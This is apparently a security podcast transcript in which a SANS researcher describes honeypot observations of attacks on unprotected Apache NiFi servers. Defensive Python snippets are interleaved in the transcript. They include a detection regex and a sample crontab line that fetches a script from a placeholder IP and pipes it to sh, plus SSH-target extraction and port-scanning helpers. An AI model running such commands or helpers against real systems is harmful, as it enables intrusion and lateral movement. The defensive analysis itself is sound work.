CyberWire Daily - Managing machine learning risks. [Research Saturday]
Episode Date: June 17, 2023
Our guest, Johannes Ullrich from SANS Institute, joins Dave to discuss their research on "Machine Learning Risks: Attacks Against Apache NiFi." Using their honeypot network, researchers were able to collect some interesting data about a threat actor who is currently going after exposed Apache NiFi servers. Researchers state “On May 19th, our distributed sensor network detected a notable spike in requests for ‘/nifi.’” Investigating further, they instructed a subset of their sensors to forward requests to an actual Apache NiFi instance and within a couple of hours the honeypot was completely compromised. The research can be found here: Machine Learning Risks: Attacks Against Apache NiFi
Transcript
You're listening to the CyberWire Network, powered by N2K.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts
tracking down the threats and vulnerabilities,
solving some of the hard problems,
and protecting ourselves in our rapidly evolving cyberspace.
Thanks for joining us.
What we saw is in our honeypot network,
we sort of get alerts whenever there's a new kind of URL
that is being probed in honeypots.
And one of the URLs that sort of caused the spike here
was slash NiFi,
which, of course, initially didn't really ring a bell.
But then doing some looking into it,
we figured out that this is likely going after Apache NiFi,
which is often described as a data orchestration platform.
That's Johannes Ullrich.
He's the Dean of Research at the SANS Technology Institute.
The research we're discussing today is titled
Machine Learning Risks, Attacks Against Apache NiFi.
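The kind of alert described above, where a URL path suddenly draws far more requests than usual, can be sketched roughly as follows. This is a minimal illustration and not the SANS sensor code: the function name `find_spiking_paths`, the `min_hits` and `ratio` thresholds, and the input format are all assumptions made for the example.

```python
from collections import Counter

def find_spiking_paths(baseline, today, min_hits=20, ratio=5.0):
    """Return paths whose request count today far exceeds the baseline.

    baseline and today are iterables of requested URL paths (a hypothetical
    input format). A path never seen in the baseline is treated as having a
    baseline count of 1 so that brand-new paths can still be flagged.
    """
    base_counts = Counter(baseline)
    today_counts = Counter(today)
    spikes = []
    for path, hits in today_counts.items():
        if hits >= min_hits and hits / max(base_counts[path], 1) >= ratio:
            spikes.append(path)
    return sorted(spikes)

# Made-up sample data: "/nifi" is new today, the other paths are steady.
baseline = ["/", "/index.html", "/wp-login.php"] * 30
today = ["/", "/wp-login.php"] * 30 + ["/nifi"] * 40
print(find_spiking_paths(baseline, today))
```

With this sample data only `/nifi` is reported, because the other paths are requested about as often as before.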
Yeah, I have to admit, NiFi was a new one to me.
It had me running to search for exactly what it was.
Can you describe to us what is the general use case for Apache NiFi?
Yeah, so a little bit of history here.
It actually was developed by the NSA, who open sourced it about 10 years ago.
And the Apache project sort of took over maintenance of it.
It's described as a data orchestration platform.
What it does is it reads data from a large number of sources,
whether that's like cloud storage, database and such.
You can filter it, you can extract subsets of that data,
and it'll save it back or send it back to some destination.
And again, you have a wide range here.
So use cases are, for example, in business data.
You receive data from a database that you then need to adapt
in order to use it, for example, in some kind of analytic system.
It's also often used these days in machine learning
because you have these large data sets that you need to adapt
in order to then process them in your machine learning algorithm.
So these are some of the use cases here.
It's written in Java, and one of the nice things about it is
you don't really need to do a lot of coding with it.
It sort of presents a GUI web interface.
You can sort of drag and drop your sources.
You can configure credentials for your S3 bucket and tell it,
hey, read that JSON file,
pull it out of there, turn it into an XML file that maybe my enterprise resource planning system can read.
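To make the JSON-to-XML example concrete, here is a rough sketch of that kind of transformation written by hand in Python. It is not how NiFi does it internally; NiFi would do this through configured processors. The function name `json_records_to_xml`, the tag names, and the sample data are assumptions for illustration.

```python
import json
import xml.etree.ElementTree as ET

def json_records_to_xml(json_text, root_tag="records", item_tag="record"):
    """Convert a JSON array of flat objects into an XML string.

    Assumes every key is a valid XML element name and every value is a
    simple scalar; nested structures are out of scope for this sketch.
    """
    root = ET.Element(root_tag)
    for record in json.loads(json_text):
        item = ET.SubElement(root, item_tag)
        for key, value in record.items():
            ET.SubElement(item, key).text = str(value)
    return ET.tostring(root, encoding="unicode")

# Made-up sample input standing in for a file read from cloud storage.
sample = '[{"sku": "A1", "qty": 3}, {"sku": "B2", "qty": 7}]'
print(json_records_to_xml(sample))
```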
Well, let's walk through this together.
I mean, as you say, you were noticing some things
on your honeypot, so where did it go from there?
Well, then of course we want to figure out
what is it actually attempting to do here?
They're definitely looking for NiFi, but why?
That's, of course, the next question.
There is, of course, some interesting data often in these NiFi systems.
So what we did is we set up an actual NiFi instance.
The problem, of course, with what is often described as a full interaction honeypot is you can't really set up a lot of them.
We set up one of them, but in our honeypot network, we have sort of the feature
where we can redirect queries from the honeypots to a system like this.
So a subset of the honeypots, whenever they saw something
going to port 8080 or 8443, which are default ports for Apache NiFi,
well, they were just proxying it to our real NiFi instance
that we were able to monitor.
And now, of course, the attacker, well,
they couldn't tell that this was a honeypot anymore.
They considered that a real NiFi instance,
which actually, well, it was.
It was a real full-featured NiFi instance.
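The forwarding setup described here boils down to a routing decision on each sensor. The sketch below shows only that decision, under stated assumptions: the sensor IDs, the backend host name `nifi-backend.example`, and the function `route_request` are hypothetical, and the actual proxying is left out.

```python
NIFI_DEFAULT_PORTS = {8080, 8443}  # the default ports mentioned in the episode

def route_request(sensor_id, dest_port, forwarding_sensors,
                  backend="nifi-backend.example"):
    """Decide whether a sensor answers locally or proxies to the real instance.

    Only sensors in forwarding_sensors forward traffic, and only traffic
    aimed at the default NiFi ports. Everything else stays on the
    low-interaction honeypot.
    """
    if sensor_id in forwarding_sensors and dest_port in NIFI_DEFAULT_PORTS:
        return ("proxy", backend)
    return ("local", None)

forwarding = {"sensor-07", "sensor-19"}  # hypothetical subset of sensors
print(route_request("sensor-07", 8443, forwarding))
print(route_request("sensor-02", 8080, forwarding))
```

Keeping the forwarding subset small reflects the constraint mentioned above: there is only one full-interaction instance behind the sensors.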
So you see them coming in and searching for this,
and when they hit the NiFi instance, what do they do?
Well, there are sort of two things we saw.
One thing was they installed a crypto coin miner, of course.
It was a little bit of a letdown initially, I have to admit,
because that's what everybody does.
And they used a feature, it's not a vulnerability.
So I want to point out here that at no time
they actually abused a vulnerability
or some kind of zero day or such here.
We had a completely patched and up-to-date version
of NiFi,
but NiFi has a feature built in that allows you to execute code.
And that's the sort of processor that you can set up to process your data,
where you can basically load scripts that will process your data.
And with that, you have the ability to run arbitrary code.
The real problem here is that the attacker took advantage of NiFi not requiring
a password for access.
Setting one is highly recommended in the documentation, but who
reads the manual?
Is this primarily a
configuration issue where folks
who are making use of this are
neglecting to properly secure it or
exposing it to the internet to begin with?
I think both.
So you never really should expose something like this to the internet.
It's a very complex system.
It had vulnerabilities in the past, nothing really super critical.
So they have done a reasonably good job there.
But the number one problem is that configuration issue
that you didn't configure a password.
It's not hard.
Like I said, there is documentation for it.
They have a simple command to set up a password.
So it's not really all that difficult.
It becomes a real problem if you actually process real data with NiFi.
Because now you not only have access to the data,
but also credentials.
Because in order for NiFi to access the data,
well, NiFi needs to know
how to connect to a database, how to connect to that S3 bucket. That information an attacker could
also retrieve from NiFi if there's no password or a weak password. The other thing we then saw
is that in addition to installing CryptoCoin, as I said, was sort of a little bit of letdown.
The most they did, but there were a of attackers also that used NiFi to then probe the network.
So once they had control of the NiFi server,
they didn't know what's offered for this lateral movement
where they searched the NiFi server for credentials,
in particular SSH keys.
They looked at, hey, did anybody log in to this NiFi server
and then connect anywhere else via SSH?
So they went all through the account and host combinations there and basically tried to abuse any of them to gain additional access to systems.
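A defender can get a rough idea of what such a search would turn up by listing the SSH destinations recorded in shell history on the server. The sketch below is an audit aid under assumptions: it only looks at history text passed in as a string, the helper name `ssh_targets` is hypothetical, and the set of options treated as taking a value is deliberately small.

```python
import shlex

# Common ssh options that are followed by a value (not an exhaustive list).
FLAGS_WITH_VALUE = {"-i", "-p", "-l", "-o", "-F", "-J"}

def ssh_targets(history_text):
    """Return the sorted set of ssh destinations found in shell history text."""
    targets = set()
    for line in history_text.splitlines():
        try:
            tokens = shlex.split(line)
        except ValueError:
            continue  # skip lines with unbalanced quotes
        if not tokens or tokens[0] != "ssh":
            continue
        args = iter(tokens[1:])
        for token in args:
            if token in FLAGS_WITH_VALUE:
                next(args, None)  # skip the option's value
            elif not token.startswith("-"):
                targets.add(token)  # first positional argument is the destination
                break
    return sorted(targets)

# Made-up history contents for illustration.
history = (
    "ls -la\n"
    "ssh deploy@db01.internal\n"
    "ssh -i ~/.ssh/id_rsa -p 2222 admin@10.0.0.5 uptime\n"
    "curl http://example.com\n"
)
print(ssh_targets(history))
```

Every destination in that list is a system worth reviewing if the server it came from is compromised.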
Now, for the folks who are running this NiFi instance,
say someone comes in and drops a crypto miner in, is it obvious that that has happened?
Or does it run quietly behind the scenes?
Well, it depends on how carefully you look.
Within the GUI, you will see these processors that the attacker has set up.
So that's something that you should notice.
Of course, if you have a very complex instance,
there may be tons of processors that you already have configured.
It may not be that obvious that you actually have a new one here that wasn't authorized.
In the case that we observed, the attacker also set up a cron job in order to
have sort of a backup in case that processor gets deleted or NiFi gets removed from that system.
That cron job would run once a minute and try to reinstall things again. Overall, this was fairly
noisy, so an administrator should be able to notice that if they're watching.
Let's face it, they didn't start by setting up a password for it, so who knows what else
is missing there.
And of course, odd network connections then outbound from that system and such, which
may or may not be notable depending on how noisy your network is in general.
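One way an administrator might look for the persistence described here is to scan crontab text for entries that run every minute and pipe a download into a shell. This is a heuristic sketch, not a detection rule from the research: the function name `suspicious_cron_lines`, the regular expression, and the sample crontab (which uses a documentation-range IP address) are assumptions.

```python
import re

# Matches a curl or wget invocation whose output is piped into sh or bash.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def suspicious_cron_lines(crontab_text):
    """Return crontab entries that run every minute and pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # not a standard five-field schedule plus command
        schedule, command = fields[:5], fields[5]
        if schedule == ["*"] * 5 and DOWNLOAD_TO_SHELL.search(command):
            hits.append(line)
    return hits

# Made-up crontab contents for illustration.
crontab = (
    "# nightly backup\n"
    "0 2 * * * /usr/local/bin/backup.sh\n"
    "* * * * * curl -s http://203.0.113.5/x.sh | sh\n"
)
print(suspicious_cron_lines(crontab))
```

A legitimate job can match this pattern too, so a hit is a prompt for a closer look rather than proof of compromise.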
Yeah.
Now, in your research, correct me if I'm wrong here,
this is all running in RAM, so it's trying to hide itself that way?
Yeah, so the install script that's being downloaded is never saved to disk.
It's a simple bash script.
It just uses curl, the command line tool, to retrieve commands
or retrieve files via HTTP,
and passes them directly to sh, to the shell.
So that's never being saved.
The crypto coin miner they're downloading is being saved.
Some of the other things like the SSH scanning of other machines,
also no real files being saved here.
That's the same thing.
It just downloads it via curl and pipes it directly to shell.
While you may find some miscellaneous
evidence of this, there is no
actual file being saved on the system.
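Why nothing lands on disk is easier to see with a harmless stand-in. In the sketch below, script text is handed to `sh` on standard input, which is what piping a download into a shell amounts to; the shell executes it without any script file being created. The function name `run_script_from_memory` and the `echo` script are assumptions, and a POSIX `sh` is assumed to be available.

```python
import subprocess

def run_script_from_memory(script_text):
    """Feed script text to `sh` on standard input and return its output.

    The script exists only in memory and in the pipe to the shell; no
    script file is written to disk.
    """
    result = subprocess.run(
        ["sh"], input=script_text, capture_output=True, text=True, check=True
    )
    return result.stdout

# A benign one-line script standing in for the downloaded installer.
print(run_script_from_memory("echo streamed-not-saved\n"))
```

For an investigator, this means evidence has to come from process, network, or shell-level logging rather than from a leftover script file.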
Yeah.
Is it fair to say from your description here
that we're looking at opportunists
basically? This isn't a high level of
sophistication?
Correct. This looks like opportunists. The cryptocurrency miner, of course, could also be sort of their
last resort, kind of, if they don't find anything else interesting to do with this instance.
And our instance didn't really have any interesting data, so they say, you know,
let's make some crypto coins while we're in here and sort of use it this way.
The interesting part was there was really just
one attacker who was really
heavily scanning for this.
Also, we then sort of went through some searches
to see, well, you know, who's actually exposing
NiFi? And
found a lot of sort of cloud
instances, like particularly in Azure
and such, where people had
NiFi set up. And that's, of course, where
the entire issue
with blocking Internet access becomes more tricky
because, well, now your NiFi instance is in the cloud,
you have to connect to it via the open Internet
unless you set up some careful IP address filtering,
which you easily get wrong and then you lose access to it.
So that may be one reason why there are these
exposed NiFi instances.
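The IP address filtering mentioned here is, at its core, an allowlist check. The sketch below shows that check using Python's standard `ipaddress` module. In practice the rule would live in a cloud security group or firewall rather than in application code, and the networks listed (documentation ranges) and the name `is_allowed` are assumptions.

```python
import ipaddress

def is_allowed(client_ip, allowed_networks):
    """Return True if client_ip falls inside any of the allowed networks."""
    addr = ipaddress.ip_address(client_ip)
    return any(addr in ipaddress.ip_network(net) for net in allowed_networks)

# Hypothetical allowlist: an office range and one administrator's address.
ALLOWED = ["198.51.100.0/24", "203.0.113.17/32"]

print(is_allowed("198.51.100.42", ALLOWED))
print(is_allowed("203.0.113.18", ALLOWED))
```

The second lookup fails because a `/32` entry matches exactly one address, which is the sort of detail that locks people out when their own address changes.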
Yeah, that's interesting. Any idea who is behind this? You said it seems to be coming from one place primarily.
Yeah, we saw a lot of Russian IPs that are part of the infrastructure
where the hosts are located, where all the scripts are being loaded from. Some Ukrainian hosts,
one in particular, do a lot of scanning.
Although these days, geolocation with Ukraine versus Russia can sometimes be a little bit tricky.
I haven't really looked that closely into it.
But I haven't really found any strong evidence
as far as nationality or so goes.
It's using commodity malware like this crypto coin miner
is fairly commonly found.
So I'm not really sure if that's one actor or another.
It could be anybody.
Any notion of how widespread this is?
Well, like I said, we really see one attacker
who is trying it really hard.
As far as open NiFi instances,
a quick scan of the standard search engine
shows a couple of hundred maybe that are out there
that are open to the public on default ports.
Hadn't really looked too closely
how many are maybe hiding a little bit
on slightly different URLs.
But this attacker really seems to go
for these default instances.
This could also be something where an attacker,
once they gain access to a network,
is looking for these NiFi instances.
Because after all, they do allow that arbitrary code execution.
So that would be also then an initial lateral movement again for an attacker
who breached a network with a NiFi instance.
Right, right. While I'm here, I might as well drop a cryptocurrency miner.
Or just look for any data being touched by NiFi.
That's something we'll probably do in the future,
put some credentials in there and see if they're then being used.
Right. So what are the recommendations then
for folks who are using Apache NiFi?
What sort of things should they be looking out for here?
I think the number one thing is right now just inventory.
That's sort of one problem here.
You may find data scientists, people in business analytics and such
that set up NiFi instances in the cloud, that rogue IT kind of
issue where they don't necessarily properly account for it,
and so it never really gets properly configured and patched and all of that good stuff.
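A first pass at that inventory could be as simple as checking which of your own hosts accept connections on the default ports mentioned earlier. The sketch below does only that, under assumptions: the function name `find_listeners` and the example host names are hypothetical, and an open port shows that something is listening, not that it is NiFi.

```python
import socket

def find_listeners(hosts, ports=(8080, 8443), timeout=1.0):
    """Return (host, port) pairs that accept a TCP connection."""
    found = []
    for host in hosts:
        for port in ports:
            try:
                with socket.create_connection((host, port), timeout=timeout):
                    found.append((host, port))
            except OSError:
                pass  # closed, filtered, or unreachable
    return found

# Example call (hypothetical host names; only scan systems you are
# authorized to test):
# print(find_listeners(["analytics-01.internal", "ml-lab.internal"]))
```

Any hit can then be followed up by hand to see who set the system up and whether it requires a login.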
But the number one thing is if you have NiFi, put a password in there.
Even a weak password is better than no password.
But while you're at it, pick something a little bit better than NiFi kind of as a password.
Right, NiFi 1, yeah.
Right, while you're putting in a password,
oh, what the heck, make it a strong one.
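Picking "something a little bit better" is easy to automate. The sketch below generates a random password with Python's `secrets` module, which is intended for security-sensitive randomness. The function name `generate_password`, the default length, and the 12-character floor are choices made for this example, not requirements quoted from the episode.

```python
import secrets
import string

def generate_password(length=24):
    """Return a random password drawn from ASCII letters and digits."""
    if length < 12:
        # Minimum chosen for this sketch; adjust to your own policy.
        raise ValueError("use at least 12 characters")
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())
```

The result would then be stored in a password manager and set through whatever mechanism the NiFi documentation describes for your version.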
Yes.
I don't think there is much sort of
in terms of a strong authentication,
but I haven't really looked into
how it sort of would integrate
with any kind of SSO or such.
Right, right.
It's really an interesting case here
because, I mean, obviously a legitimate tool,
not terribly widespread usage, it would seem.
And yet, some clever hacker out there has found a way to use it to their advantage.
I suppose it's kind of a cautionary tale.
Yeah, and that's really just if it's out there, if it's vulnerable, they'll find it.
They may find it before you find it, and that's really the big problem.
Our thanks to Johannes Ullrich from the SANS Technology Institute for joining us.
The research is titled
Machine Learning Risks,
Attacks Against Apache NiFi.
We'll have a link in the show notes.
The CyberWire Research Saturday podcast is a production of N2K Networks,
proudly produced in Maryland out of the startup studios of DataTribe,
where they're co-building the next generation of cybersecurity teams and technologies.
This episode was produced by Liz Irvin and senior producer Jennifer Eiben.
Our mixer is Elliott Peltzman.
Our executive editor is Peter Kilpe.
And I'm Dave Bittner.
Thanks for listening.